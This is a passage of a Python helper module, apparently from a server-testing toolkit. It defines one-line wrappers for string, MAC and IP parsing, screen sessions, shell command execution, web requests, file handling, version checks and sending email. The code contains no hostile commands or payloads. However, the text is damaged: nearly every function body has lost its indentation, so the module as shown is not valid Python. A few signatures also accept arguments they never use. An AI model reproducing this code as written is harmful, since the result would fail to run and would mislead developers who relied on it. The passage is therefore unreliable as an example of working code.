return STR(src).Wrap(space=space,space_mode=space_mode,sym=sym,default=default,NFLT=NFLT,out=out)
def Split(src,sym,default=None):
return STR(src).Split(sym,default=default)
def screen_kill(title):
return SCREEN().Kill(title)
def screen_monitor(title,ip,ipmi_user,ipmi_pass,find=[],timeout_sec=600):
return SCREEN().Monitor(title,ip,ipmi_user,ipmi_pass,find=find,timeout=timeout_sec)
def screen_id(title=None):
return SCREEN().Id(title)
def screen_logging(title,cmd):
return SCREEN().Log(title,cmd)
def mac2str(mac,case='lower'):
return MAC(mac).ToStr(case=case)
def str2mac(mac,sym=':',case='lower',chk=False):
return MAC(mac).FromStr(case=case,sym=sym,chk=chk)
def is_mac4(mac=None,symbol=':',convert=True):
return MAC(mac).IsV4(symbol=symbol)
def rshell(cmd,timeout=None,ansi=True,path=None,progress=False,progress_pre_new_line=False,progress_post_new_line=False,log=None,progress_interval=5):
return SHELL().Run(cmd,timeout=timeout,ansi=ansi,path=path,progress=progress,progress_pre_new_line=progress_pre_new_line,progress_post_new_line=progress_post_new_line,log=log,progress_interval=progress_interval)
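# rshell() wraps SHELL().Run(); throughout this module rc[0] is treated as the
# exit code and rc[1] as the captured output. A minimal sketch:
#   rc = rshell('ls /tmp', timeout=10)
#   if rc[0] == 0:
#       print(rc[1])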
def gen_random_string(length=8,letter='*',digits=True,symbols=True,custom=''):
mode='alpha'
if digits:mode=mode+'num'
if symbols:mode=mode+'char'
return Random(length=length,strs=custom,mode=mode,letter=letter)
def string2data(string,default='org',want_type=None):
return CONVERT(string).Ast(default=default,want_type=want_type)
def str2url(string):
return WEB().str2url(string)
def is_bmc_ipv4(ipaddr,port=(623,664,443)):
return IP(ipaddr).IsBmcIp(port=port)
def is_port_ip(ipaddr,port):
return IP(ipaddr).IsOpenPort(port)
def ipv4(ipaddr=None,chk=False):
return IP(ipaddr).V4(out='str',default=False)
def ip_in_range(ip,start,end):
return IP(ip).InRange(start,end)
def is_ipv4(ipaddr=None):
return IP(ipaddr).IsV4()
def ip2num(ip):
return IP(ip).Ip2Num()
def web_server_ip(request):
web=WEB(request)
return web.ServerIp()
def web_client_ip(request):
web=WEB(request)
return web.ClientIp()
def web_session(request):
web=WEB(request)
return web.Session()
def web_req(host_url=None,**opts):
return WEB().Request(host_url,**opts)
def logging(*msg,**opts):
return printf(*msg,**opts)
def is_py3():
return PyVer(3)
def get_value(src,key=None,default=None,check=[str,list,tuple,dict],err=False):
return Get(src,key,default=default,check=check,err=err)
def file_rw(name,data=None,out='string',append=False,read=None,overwrite=True):
return FILE().Rw(name,data=data,out=out,append=append,read=read,overwrite=overwrite,finfo={})
def rm_file(filelist):
return FILE().Rm(filelist)
def append2list(*inps,**opts):
return LIST(inps[0]).Append(*inps[1:],**opts)
def sizeConvert(sz=None,unit='b:g'):
return CONVERT(sz).Size(unit=unit)
def list2str(arr):
return Join(arr,symbol=' ')
def _u_str2int(val,encode='utf-8'):
return BYTES(val).Str2Int(encode)
def _u_bytes(val,encode='utf-8'):
return BYTES(encode=encode).From(val)
def _u_bytes2str(val,encode='latin1'):
return BYTES(val).Str(encode=encode)
def _u_byte2str(val,encode='latin1'):
return _u_bytes2str(val,encode=encode)
def CompVersion(src,compare_symbol,dest,compare_range='dest',version_symbol='.'):
return VERSION().Compare(src,compare_symbol,dest,compare_range=compare_range,version_symbol=version_symbol)
def Int(i,default={'org'}):
return CONVERT(i).Int(default=default)
def Lower(src):
if isinstance(src,str): return src.lower()
return src
def sendanmail(to,subj,msg,html=True):
    Email=EMAIL()
    return Email.Send(to,sender='root@sumtester.supermicro.com',title=subj,msg=msg,html=html)
def mktemp(filename=None,suffix='-XXXXXXXX',opt='dry',base_dir='/tmp'):
return FILE().MkTemp(filename=filename,suffix=suffix,opt=opt,base_dir=base_dir)
def check_version(a,sym,b):
return VERSION().Check(a,sym,b)
def Pwd(cwd=None):
return FILE().Path(cwd)
def get_my_directory(cwd=None):
return FILE().Path(cwd)
def IsSame(src,chk_val,sense=False):
return IS().Same(src,chk_val,sense=sense)
def move2first(item,pool):
return LIST(pool).Move2first(item)
def now():
return TIME().Int()
def int_sec():
return TIME().Int()
def clean_ansi(src):
return ANSI().Clean(src)